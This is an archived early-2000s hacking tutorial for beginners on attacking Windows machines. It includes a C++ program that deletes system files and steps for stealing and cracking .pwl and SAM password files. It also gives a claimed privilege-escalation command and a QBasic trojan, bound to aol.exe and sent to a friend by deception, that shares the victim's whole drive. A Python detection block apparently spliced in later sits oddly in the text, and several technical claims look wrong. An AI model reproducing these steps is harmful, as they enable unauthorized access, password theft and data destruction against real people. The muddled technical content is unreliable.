💾 Archived View for gemini.theuse.net › textfiles.com › uploads › beginners.txt captured on 2022-01-08 at 20:53:19.


Hacking Windows
      for
The Complete Newbie

      Part 1


By: SLIPStream (formerly known as Morbos or Dynamite)
Contact information located at the end of the file.

(Please note: Newbie is not meant to be used
as a put-down. All great hackers were once
newbies, so please don't get POed) :)


WARNING: This file contains some elements which
are considered illegal in most countries including
the United States. The author assumes no responsibility
for the actions of the reader after reading this file.
The reader hereby understands that the file is for
educational purposes ONLY. The author does not encourage
illegal activity and cannot be held responsible for the
reader's actions. If you agree to this, proceed in reading
the file, otherwise, please exit now.


Lesson 1: The Windows FileSystem

Ok. Unless you know virtually nothing about hacking,
skip this lesson; it is only meant to be used by
the very beginners, k? Thanks a lot.

Here's the layout of the Windows filesystem:


C:\   <--- Can be replaced with any other drive letter, e.g. E, F, A, B
|_ >   C:\Windows
   >            \_>  System files
   >             \_>  Other files used by Windows
   >              \_>  Don't delete anything in here.
   >   C:\Program Files
   >            \_>  Used by programs
   >             \_>  Don't alter these unless you want to
   >               >  uninstall them
   >               \_> .dll files stored here for programs
   >   C:\DOS
   >            \_>  This directory only exists on REALLY old
   >             \_> Windows systems, i.e. Win95 in its early editions
   >              \_> or Win 3.1 (I hope nobody still has that.)


Easy enough, eh? Open up My Computer and click on C:\ or whatever your
main drive is. Explore it, and when you're ready, move on to the next
lesson.


Lesson 2: Exploiting Windows

Windows is so cruddy, even someone new to computers could mess
with it! Let's start. Ok, first you need to know some file extensions:

	.exe	an executable file
	.bat	a batch file (full of dos commands)
	.html	an html file used for webpages
	.htm	' ditto '
	.dll	a dynamic link library file. used for 
		program instructions
	.obj	object file, used for compiling
		(don't worry about it right now)
	.jpg	an image file
	.bmp    ' ditto '
	.gif	' ditto ' or an animated image file
	.mp3	sound file
	.wav	older sound file
	.mpg	video file
	.swf	a flash video file (neat)

You can find lots more. If you're not getting all this, you probably
want to get Windows for Dummies. It's available at Barnes & Noble
pretty cheap in the computer section.


Ok. Proceed ONLY if you understand all this, otherwise you'll screw
your computer over.


First of all, download a C/C++ compiler. If you don't know what that is,
then don't proceed.

Once you know how to compile stuff and write some simple programs,
go to the next subsection (A).

	A: Your first exploitation. 
	
		Ok, put this into your C++ compiler.

		/* This program will completely kill windows
		   so DO NOT run it */

		#include <iostream>
		#include <dos.h>
		#include <stdlib.h>
		#include <conio.h>
		
		using namespace std;

		void pause();
		void destroy();		

		int main()
		{
			cout << "This will destroy your computer.\n";
			cout << "Are you sure you want to continue???\n";
			cout << "If not, click X now.\n";
			pause();
			cout << "Are you really really sure??? \n";
			pause();

			destroy();
			
			return 0;
		}

		void pause()
		{
			system("pause");
		}

		void destroy()
		{
			system("if exist c:\win.ini del c:\win.ini else echo .");
			system("if exist c:\windows.ini del c:\windows.ini else echo .");
		}


		Compile it and build/link it. DO NOT RUN IT!!!
		If you run this and press Enter twice it will kill your computer.


		What does this do???
		First of all:

		/* This program will completely kill windows
		   so DO NOT run it */

		is nothing but a comment. The compiler disregards it.

		Then:
		#include <iostream>
		#include <dos.h>
		#include <stdlib.h>
		#include <conio.h>

		These statements include header files. Header files
		contain the declarations needed to call C/C++ library functions.

		void pause();
		void destroy();

		To use a function other than main, you must declare it so that
		the system can allocate memory for it.

		int main()
		{
			cout << "This will destroy your computer.\n";
			cout << "Are you sure you want to continue???\n";
			cout << "If not, click X now.\n";
			pause();
			cout << "Are you really really sure??? \n";
			pause();

			destroy();
			
			return 0;
		}

		This is the main program where we call the other functions.

		void pause()
		{
			system("pause");
		}

		This is the pause function. Here we use the DOS command pause; the
		function is called from the main program.
		
		void destroy()
		{
			system("if exist c:\win.ini del c:\win.ini else echo .");
			system("if exist c:\windows.ini del c:\windows.ini else echo .");
		}
	
		This is the main part of the program where it deletes the win.ini file on XP/NT/2000
		or windows.ini on win3x or win9x (3.1 is 3x, and win95/98/2000 are 9x).

		I strongly advise against running this program. If you cannot see why,
		then you need to learn more about C++.

		If all this was too complicated for you, you could write it in QBasic, which
		requires downloading another compiler (this one is small, so you can download
		it on 56k dialup).



		B: Breaking into the library exploit

		I call this the breaking into the library exploit because it lets you break into
		anyone's account on a Windows machine, but only allows read access.

		(quick lesson on access:

			read: users can only read from the file, but cannot write to it
			write: users can write to the file
			no access: users cannot read or write to the file.  )


		Ok. Open up the DOS prompt. (You need to know some DOS commands to use this
		exploit).

		When the prompt comes up type this:

		c:\windows> cd c:\windows\profiles

		Do not type the c:\windows> part, this only represents the command prompt.

		Now type:

		c:\windows\profiles> dir

		(Notice \profiles has now been added to c:\windows)

		Something like this should come up:

		12/18/2003  05:52 AM    <DIR>          .
		12/18/2003  05:52 AM    <DIR>          ..
		12/17/2003  07:04 PM    <DIR>          administrator
		11/17/2003  09:16 PM    <DIR>          All Users
		12/04/2003  03:59 PM    <DIR>          funnyguy
		12/20/2003  06:33 AM    <DIR>          anotheruser
		12/27/2003  10:44 PM    <DIR>          someuser
		               0 File(s)              0 bytes
		               7 Dir(s)   3,671,572,480 bytes free

		Well, this gives you an idea of who is on the computer.
		Now type:

		c:\windows\profiles> cd funnyguy

		c:\windows\profiles\funnyguy> dir |more
		
		Something like this will come up:

 		Volume in drive C has no label.
 		Volume Serial Number is ECB8-7534

 		Directory of E:\Documents and Settings\funnyguy

		12/27/2003  10:44 PM    <DIR>          .
		12/27/2003  10:44 PM    <DIR>          ..
		11/18/2003  05:58 PM    <DIR>          .java
		11/22/2003  12:30 AM    <DIR>          .jpi_cache
		11/19/2003  08:57 PM    <DIR>          .limewire
		12/26/2003  12:25 AM               697 .plugin141_05.trace
		12/24/2003  01:53 PM             4,754 ac3dprefs.txt
		12/18/2003  01:30 PM                 0 annoy.cpp
		12/17/2003  04:52 PM            42,967 arena.cpp
		12/17/2003  04:52 PM             3,389 arena.dsp
		12/17/2003  04:52 PM               535 arena.dsw
		12/17/2003  04:52 PM            34,026 arena.h
		12/17/2003  04:52 PM            33,792 arena.ncb
		12/17/2003  04:52 PM            48,640 arena.opt
		12/17/2003  04:52 PM             1,278 arena.plg
		12/16/2003  06:23 PM    <DIR>          attacker
		12/27/2003  07:19 PM    <DIR>          AWSGuitarTuner_Windows
		12/16/2003  06:15 PM    <DIR>          battlepong
		12/17/2003  04:30 PM    <DIR>          cheat260
		12/17/2003  04:22 PM    <DIR>          crypt3
		12/23/2003  09:07 PM    <DIR>          dc_40_stand_eng
		12/25/2003  10:28 AM    <DIR>          Debug
		12/28/2003  12:26 AM    <DIR>          Desktop
		12/15/2003  06:31 PM    <DIR>          Favorites
		12/16/2003  06:15 PM    <DIR>          fedup
		12/16/2003  04:49 PM    <DIR>          grok
		12/16/2003  07:03 PM    <DIR>          hacker1_1
		12/27/2003  09:27 PM    <DIR>          Ktulu40
		12/17/2003  05:07 PM    <DIR>          midiedit
		12/17/2003  04:40 PM    <DIR>          musiced
		12/28/2003  12:27 PM    <DIR>          My Documents

		Hmm? What's all this??? His/Her personal files???!!!
		Do a little browsing.

		WINDOWS XP USERS READ THIS:

			Windows XP/NT has better security than 9x from
		the DOS console, but this same exploit can be applied by
		doing it from Explorer. Open up Internet Explorer (or whatever
		web browser you use), and in the address bar type:

		c:\documents and settings

		Then press enter.
		Ah. There we are!
		The same thing, but graphical!


Lesson 3: Starting to get a little more technical.


Ok, you know how to break into Windows the easy way. But you don't have write
access. Or maybe you want to break into some school computers but these
exploits won't work.

Let's get started!

There are two vital file types to logging in on windows:
		.pwl
			and
		SAM

The .pwl files use much weaker encryption than the SAM file,
so they are easier to obtain and crack than the SAM file.


Ok, here's how you do it. If the computer(s) you want to hack have
Windows 3.x or 9x on them, you can use this exploit:

Step 1: Insert a blank floppy into the drive.

Step 2: Start -> Run -> command -> press enter.

Step 3: c:\windows> copy c:\windows\*.pwl a:\

Step 4: Crack them with the Cain and Abel password cracker
	and you've just broken into some accounts.


Wait! How did you do that?

Ok, here's the overview of the exploit.

	All the users' passwords are contained in
	their own little .pwl files (i.e. john.pwl, sally.pwl,
	funnyguy.pwl).
	But you can't just go and read these files. They're
	encrypted so they can't be read. However, there are
	programs out there that can break these file types.
	Go to http://www.google.com and type
		'cain and abel password cracker'
	The website should be one of the first ones on the
	list. When you get to their website, download the
	Cain and Abel password cracker and get to work.
	It usually takes 1 - 2 hours to crack the password
	files depending on how big the password is.
	First the cracker tries all the words in its
	dictionary to try and find single-word passwords.
	If none of the words in its dictionary are passwords
	(there are thousands of words in there), then it
	brute-forces the password file (tries a, then b, etc.)

That's how you break into an account on 9x. Here's how you do
it on XP/NT.

What is the SAM file? 

	The SAM file is the file containing the encrypted
passwords of all the users on the system. Unlike Win 9x, where
all users have separate .pwl files, the SAM file contains all
the users' passwords in one place. Basically, if you have access to
the SAM file, you win.

The SAM file is actually hidden (much better security than 9x),
but when settings are changed on the computer, the SAM file is
updated and moved to a new directory accessible to any user.
The folder is E:\WINDOWS\system32\config

If the SAM file isn't there and you have access to the machine
at the console then you can run a search for the SAM file.
Open the Start Menu, click Search, then click on All Files,
and type the Query as 'SAM'. It will run you through some boring
sample files that Windows provides, then somewhere in the middle
it will have a file simply named 'sam', with no file extension.
Right click on it and click 'Open Containing Folder'. You should
see the sam file in there along with lots of other configuration
files. 

Put your floppy in there, right click on 'sam' and click Send to->
Floppy (A:\). In a few seconds you should have your encrypted password
file. BUT! You cannot use Cain and Abel to crack this one. Instead, a
new program is required.
The program is called L0phtCrack. Download the trial version from
http://www.atstake.com and crack that SAM file. This will generally
take longer than the .pwl files since all the users' passwords are
combined into one file.

Windows 2000 Vulnerability:
	If you have access to a machine running Windows 2000 and have
limited access to it, there is a simple command you can use to make
it give you Super-User privileges on the command prompt. Type:

C:\ netddemsg -s Chat$ cmd.exe

You should now have super user privileges on a 2000 machine!


Lesson 4: Viruses, Trojans, and Worms (oh my! :) )

This section contains code that can damage or destroy your computer.
Please do not use any of the information contained in this section.
It is only for educational purposes.


Ok, pretend you don't want any privileges on a person's machine, but you
just want to screw it up or play a prank on them.

How do you do this? Pretend the person has AOL (the crappiest ISP
out there) and they have Windows XP. Let's write some code in QBasic.

(Note: No matter what people say, QBasic is the coolest programming language
(besides Java and C++) out there).

Here's the code for file 1:

rem '#############Start Copying##############

print "Please wait while AOL is updated... "
shell "cd\windows"

open "win.ini" for output as #1

let loop# = 0

dim line1 as string
dim line1 as string
dim line3 as string
	line1 = "[WAOL]"
	line2 = "AppPath=E:\Program Files\America Online 9.0"
	line3 = "SharedPath=E:\"
dim blank as string
	blank = " "

print #1, line1
print #1, line2
print #1, line3

while loop# < 200
	print #1, blank
wend

rem '#############Stop Copying###############'

Save the file as update.bas then compile it under QBasic.
Ok, now you need a copy of the America Online main file, just use the
AOL exe file (C:\program files\America Online 9.0\aol.exe). Install
AOL 9.0 Optimized using one of those crappy AOL disks you have, then
copy aol.exe to your desktop.
Copy update.exe (the compiled version of update.bas) to your desktop.
Now download a file binder. You can get one from http://www.hackers.com
in their file archive, or you can get one from http://www.astalavista.com
Either one has some good file binders. You can also do a Google search
for one.
Once you have your file binder, have it bind aol.exe and update.exe together,
so that update.exe runs in the background and is not shown on the task bar.
Name the bound file game.exe or fun.exe, maybe even screensaver.exe. Be
creative.

Now comes the fun part!

Talk to your friend on AIM and get him/her to let you send him/her the file.
Tell them that it is some game or screensaver that they like and want. Be
persuasive and convincing. When they agree you can open a direct link from
your computer to theirs from AIM. This will allow you to send the file.

Before you send it open up your command prompt and WITHOUT PRESSING ENTER type

c:\windows> netstat -r

Go back to AIM, and be prepared to jump to the command prompt. Send the file
to your friend and quickly click on the command prompt to maximize it and press
Enter!!! If you have a fast connection, it will have gotten the IP address of your
friend. This IP address is what will be used to break in.

What was all this for???

	An IP address (Internet Protocol Address) is how your computer is
identified on the internet. It should look something like this:

65.45.12.54

By obtaining the IP address of your friend, you have found where his computer
is located on the internet. The program you wrote shares your friend's entire
hard drive, allowing you to do anything you want with it: upload, download,
see if your friend has been looking at naughty things on the internet and
whatnot.

The piece of code that made all this possible was:

	SharedPath=E:\

Normally, AOL shares its folder E:\Program Files\Common Files\AOLSHARE,
which is the AOL shared folder (doi :) ). It's not much help to only have
that folder shared, but now you have the entire hard disk shared. If you
want to, you could do whatever you want to his hard drive.
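Seen from the defender's side, this tampering is easy to spot in win.ini itself. The following check is an added example, not code from the original file: it parses win.ini text and flags a [WAOL] SharedPath that exposes a drive root, or that points anywhere other than the AOLSHARE folder the text names as the normal value. The sample win.ini fragments are constructed to match the text's description, and the claim that AOL honours this key as described is taken from the text rather than verified here.

```python
import configparser
from pathlib import PureWindowsPath
from typing import List, Optional

# Constructed sample: the [WAOL] section the update.bas program above writes.
TAMPERED_WIN_INI = """[WAOL]
AppPath=E:\\Program Files\\America Online 9.0
SharedPath=E:\\
"""

# Constructed sample: the value the text gives as AOL's normal shared folder.
NORMAL_WIN_INI = """[WAOL]
AppPath=E:\\Program Files\\America Online 9.0
SharedPath=E:\\Program Files\\Common Files\\AOLSHARE
"""

# Leaf folder name the text says AOL normally shares (assumption taken from the text).
EXPECTED_SHARE_LEAF = "AOLSHARE"


def shared_path(win_ini_text: str) -> Optional[str]:
    """Return the [WAOL] SharedPath value from win.ini text, or None if absent."""
    # win.ini is not a strict INI file: allow duplicate keys, keys without
    # values and '%' characters; only '=' separates a key from its value.
    cp = configparser.ConfigParser(
        interpolation=None, strict=False, allow_no_value=True, delimiters=("=",)
    )
    cp.read_string(win_ini_text)
    return cp.get("WAOL", "SharedPath", fallback=None)


def share_findings(win_ini_text: str) -> List[str]:
    """Flag a SharedPath that exposes a whole drive or leaves the expected folder."""
    value = shared_path(win_ini_text)
    if not value:
        return []
    path = PureWindowsPath(value)
    # A bare drive root such as E:\ has no components beyond its anchor.
    if path.drive and path.parts == (path.anchor,):
        return [f"SharedPath exposes an entire drive: {value}"]
    if path.name.upper() != EXPECTED_SHARE_LEAF:
        return [f"SharedPath points outside the expected {EXPECTED_SHARE_LEAF} folder: {value}"]
    return []


if __name__ == "__main__":
    for label, text in (("tampered", TAMPERED_WIN_INI), ("normal", NORMAL_WIN_INI)):
        print(label, share_findings(text) or ["ok"])
```

Run against a copy of a real win.ini, the same function reports the root-share rewrite without needing to know which program planted it.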

How do I find stuff they've been doing?

	Well, there are several folders containing the history and past
of the computer. First of all comes history. This is located in
C:\Documents and Settings\username\Recent
If you don't know what username your friend is under, go to
c:\documents and settings and find out.
You can't just look at the cookies (except for under 9x).
You need to open up their Internet Explorer:
E:\Program Files\Internet Explorer\IExplore.exe and click
on cookies. I'm not gonna cover all this right now.



I hope this file was a lot of help and enough to get
you started! Have fun, and don't get caught!



Contact information:

E-Mail:

blackfire@dangerous-minds.com  <- please use this one
blackfire@phayze.com  
morbos@white-star.com

For Other information:

slipstream_node@yahoo.com

Website:

dataflux.cjb.net

My Email Service:

Please request an account. I don't want to overload
my disk quota. Please contact me to request an
account. Unauthorized accounts will be deleted.

http://wwww.mysticism.zzn.net  (username@mysticism.zzn.net)

Yahoo IM:

SLIPStream_node